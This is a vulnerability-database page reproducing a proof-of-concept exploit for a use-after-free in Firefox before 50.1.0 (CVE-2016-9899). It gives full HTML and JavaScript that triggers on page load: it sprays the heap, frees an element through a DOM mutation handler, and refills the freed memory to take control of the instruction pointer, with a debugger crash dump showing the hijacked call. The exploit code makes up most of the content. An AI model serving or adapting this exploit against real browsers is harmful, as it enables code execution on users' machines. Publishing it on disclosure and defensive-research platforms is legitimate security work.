Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mozilla Firefox Use-After-Free

🗓️ 13 Jan 2017 00:00:00Reported by Marcin ResselType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 50 Views

Mozilla Firefox Use-After-Free vulnerability PO

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Mozilla Firefox 50.1.0 - Use After Free Exploit
14 Jan 201700:00
zdt
FreeBSD		mozilla -- multiple vulnerabilities
13 Dec 201600:00
freebsd
IBM Security Bulletins		Security Bulletin: Mozilla Firefox vulnerability issues in IBM SONAS
18 Jun 201800:32
ibm
IBM Security Bulletins		Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified.
18 Jun 201800:32
ibm
Tenable Nessus		Mozilla Firefox < 50.1 Multiple Vulnerabilities
5 Jan 201700:00
nessus
Tenable Nessus		Mozilla Firefox ESR < 45.6 Multiple Vulnerabilities
5 Jan 201700:00
nessus
Tenable Nessus		CentOS 5 / 6 / 7 : firefox (CESA-2016:2946)
20 Dec 201600:00
nessus
Tenable Nessus		CentOS 5 / 6 / 7 : thunderbird (CESA-2016:2973)
21 Dec 201600:00
nessus
Tenable Nessus		Debian DLA-743-1 : firefox-esr security update
16 Dec 201600:00
nessus
Tenable Nessus		Debian DLA-782-1 : icedove security update
16 Jan 201700:00
nessus
Rows per page
`<!DOCTYPE html>  
<html>  
<head>  
<!-- <meta http-equiv="refresh" content="1"/> -->  
<meta http-equiv="content-type" content="text/html; charset=UTF-8">  
<meta http-equiv="Expires" content="0" />  
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />  
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />  
<meta http-equiv="Pragma" content="no-cache" />  
<style type="text/css">  
body{  
background-color:lime;  
font-color:red;  
};  
</style>  
<script type='text/javascript'></script>   
<script type="text/javascript" language="JavaScript">  
  
/*   
* Mozilla Firefox < 50.1.0 Use-After-Free POC  
* Author: Marcin Ressel  
* Date: 13.01.2017  
* Vendor Homepage: www.mozilla.org  
* Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/  
* Version: < 50.1.0  
* Tested on: Windows 7 (x64) Firefox 32 && 64 bit  
* CVE: CVE-2016-9899  
*************************************************  
* (b1c.5e0): Access violation - code c0000005 (first chance)  
* First chance exceptions are reported before any exception handling.  
* This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll -   
* eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580  
* eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0 nv up ei pl nz na pe nc  
* cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
* xul!mozilla::net::LoadInfo::AddRef+0x3dd41:  
* 6d7cc44c ff12 call dword ptr [edx] ds:002b:4543484f=????????  
* 0:000> dd eax  
* 0f804c00 4543484f 91919191 91919191 91919191  
* 0f804c10 91919191 91919191 91919191 91919191  
* 0f804c20 91919191 91919191 91919191 91919191  
* 0f804c30 91919191 91919191 91919191 91919191  
* 0f804c40 91919191 91919191 91919191 91919191  
* 0f804c50 91919191 91919191 91919191 91919191  
* 0f804c60 91919191 91919191 91919191 91919191  
* 0f804c70 91919191 91919191 91919191 91919191  
*  
*/   
var doc = null;  
var cnt = 0;  
  
function m(blocks,size) {  
var arr = [];  
for(var i=0;i<blocks;i++) {  
arr[i] = new Array(size);  
for(var j=0;j<size;j+=2) {  
arr[i][j] = 0x41414141;  
arr[i][j+1] = 0x42424242;  
}  
}  
return arr;  
}   
  
function handler() { //free  
if(cnt > 0) return;  
doc.body.appendChild(document.createElement("audio")).remove();   
m(1024,1024);   
++cnt;  
}  
  
function trigger() {  
if(cnt > 0) {  
var pl = new Array();  
doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false);   
for(var i=0;i<4096;i++) { //replace  
pl[i]=new Uint8Array(1000);  
pl[i][0] = 0x4F;  
pl[i][1] = 0x48;  
pl[i][2] = 0x43;  
pl[i][3] = 0x45; //eip   
for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91;   
// pl[i] = document.createElement('media');  
//document.body.appendChild(pl[i]);  
}  
window.pl = pl  
document.getElementById("t1").remove(); //re-use  
}  
}  
  
function testcase()  
{  
var df = m(4096,1000);  
document.body.setAttribute('df',df);  
doc = document.getElementById("t1").contentWindow.document;  
doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false);   
doc.getElementsByTagName("*")[0].style = "ANNNY";  
setInterval("trigger();",1000);   
  
}  
</script>  
<title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>  
</head>  
<body onload='testcase();'>  
<iframe src='about:blank' id='t1' width="100%"></iframe>  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Jan 2017 00:00Current
9.8High risk
Vulners AI Score9.8
EPSS0.21401
mozilla firefoxuse-after-freepoccve-2016-9899windows 7x64
50